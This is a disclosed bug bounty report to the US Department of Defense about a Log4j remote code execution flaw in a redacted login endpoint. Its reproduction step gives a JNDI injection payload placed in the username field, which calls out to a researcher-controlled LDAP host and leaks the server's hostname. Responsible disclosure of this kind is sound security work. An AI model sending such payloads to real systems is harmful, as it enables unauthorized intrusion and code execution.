██████_log4j - https://██████

Disclosed: 2022-09-06 19:07:13 By hachimanxienim To deptofdefense
Critical
Vulnerability Details
Hi security team, i found a log4j vulnerability in your aplication ## Impact Logging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input. ## System Host(s) ███████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce Send POST request to this endpoint ---> https://██████/mifs/j_spring_security_check the post request: j_username=${jndi:ldap://${hostName}.youinteractsserver}&j_password=password&logincontext=employee ## Suggested Mitigation/Remediation Actions
Actions
View on HackerOne
Report Stats
  • Report ID: 1631364
  • State: Closed
  • Substate: resolved
  • Upvotes: 1
Share this report